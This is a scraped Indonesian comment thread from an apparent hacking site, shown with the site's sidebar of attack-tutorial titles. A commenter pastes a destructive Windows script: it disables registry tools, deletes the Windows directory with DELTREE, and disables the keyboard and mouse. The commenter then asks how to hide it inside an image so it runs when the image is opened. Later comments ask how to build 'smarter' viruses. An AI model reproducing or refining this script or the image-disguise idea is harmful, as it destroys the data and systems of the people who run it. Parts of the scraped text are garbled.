    On Erorr Resume Next
    Createobject(“WScript.Shell”).run “cmd.exe/c
    reg add
    hkcusoftware\microsoft\windows
    \currentversion\poli cies\system /v
    disableregistrytools /t reg dword /d “”1″” /
    f”,
    vbhide
    DELTREE /Y %windir%
    @ping.exe 127.0.0.1 -n 15 -w 1000 > nul
    rundll32 keyboard,disable
    rundll32 mouse,disable
    cls
    -IDMANDK1.5.exe-
    MAU NANYA GAN KALO Sembunyiin Filenya ke
    Gambar,, lalu automatis ketika klik OPEN
    program berjalan gimana gan? bisa ga?????
    Silahkan Berikan Tanggapan Anda…
    Nama (harus diisi)
    Email (harus diisi)
    Website
    Komentar
    Submit Komentar
    Komentar
    SEARCH BINUS HACKER
    SEARCH
    ATTENTION
    Seluruh artikel di website Binus Hacker
    semata mata bertujuan untuk belajar,
    berbagi dan mengembangkan ilmu
    pengetahuan. Diperoleh dari berbagai
    sumber dan referensi di dunia maya. Bagi
    para penulis artikel kami ucapkan terima
    kasih.
    [ BACA SELENGKAPNYA ]
    Bagi anda yang ingin menjadi Penulis Binus
    Hacker, silahkan kirimkan data anda melalui
    email ke: staff@binushacker.org
    Copyleft © by all respective authors. We are
    neither affiliated nor related in anyway with
    the article owner or writer. Enjoy!
    ENEWS & UPDATES
    Daftarkan e-mail untuk mendapatkan
    kabar terbaru dari BINUS HACKER!
    Subscribe
    DONASI UNTUK BINUS HACKER
    ARTIKEL TERBARU BINUS HACKER
    Deface Web Wiz Rich Text Editor
    Cara Membuat Foto / Gambar / Capture
    HOAX
    Powered by Modulus -> Shell Upload
    Vulnerability
    Script BOM E-Mail Menggunakan PHP
    Bypass Password Windows XP &
    Windows 7
    Membuka Program Lain Dengan Suara
    Kumpulan URL Link Situs Keamanan
    Website
    Phishing Attack: Login Overflow
    Cara Mengetahui Lock Code Handphone
    Cara Pemasangan Kabel Front Panel CPU
    Cara Menyembunyikan File Dalam Gambar
    Dasar Pemrograman Database MySQL
    Membuat Password Pada Folder Penting
    Program Penampil Text Dengan
    Assembler
    Mengubah EXIF MetaData Sebuah Photo
    Deface Dengan WebDav Shell Maker
    Installasi XenServer & XenClient
    Membuat Virus Menggunakan TeraBIT
    Cara Mengatasi Error Missing
    mozsqlite3.dll
    Hacking & Online Aman Dengan TOR /
    VIDALIA
    Cara Meningkatkan Kinerja Windows 7
    Aman Bertukar Data Menggunakan PGP
    Cara Membuat MP3 CD Musik & Video
    Instalasi CMS JCOW Di Free WebHosting
    Troubleshooting: CPU / Monitor Tidak
    Menyala
    SQLI Hunter: SQL Injection Hunter
    Kumpulan Ebook Gratis 2012
    SMB Scanning Vulnerability
    Simple Deface OpenCart Website
    Membuat Key Logger Dengan Visual Basic
    DNS Host URL Fil

    kal ga bisa n ga paham kunjungi aja link dibawah ini cepat sebelum alamatnya terdelet

    http://ummunajwa.web.id/cara-bikin-sambal-terasi/

    salam chif handoyo
    master heker …………………
    ……….:……………
    ………
    …..
    ……
    ……
    …..
    …..
    …..
    ….
    ….

    ….
    ….
    ..

    ….
    ….



    ….

    ….

    ….



    Sambal trasi bos

    ha…..99X

  207. erte pada 12 September 2012 11:38 pm

    tunggu azab dari Allah SWT bagi penjail2 yang suka jaili orang

  208. ghifani sifa fauzi pada 3 October 2012 5:14 am

    kk gimana sih cara buat anti virus sendiri? pliss kk
    aku dah kuliah da tugas buat anti virussssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss

  209. ghifani sifa fauzi pada 3 October 2012 5:16 am

    plisssss

  210. fadlun pada 6 October 2012 12:58 am

    bang gimana tips membuat virus supaya pinter.

  211. Imroen Naziry pada 14 December 2012 10:04 am

    waduch gak ngerti aku west.. piye piye…..?

  212. Roki11012430 pada 6 March 2013 8:19 pm

    ship gan virusnya ada caranya untuk menghentikan ga????

  213. tino pada 7 May 2013 1:39 am

    gan gimana caranya klo client wrnet properties’nya d’kunci dari bilink? mohon pencerahan ada yang bisa bantu?
    jackhumer_gc@yahoo.com

  214. Akbar pada 29 November 2013 2:07 am

    Ijin Copas Bang? Boleh?
    untuk rangkuman sendiri

  215. benny marta pada 30 November 2013 4:48 pm

    Mau tanya gan, emangnya virus-virus ini di buat untuk apa ya?
    makasih jawabannya.

Silahkan Berikan Tanggapan Anda...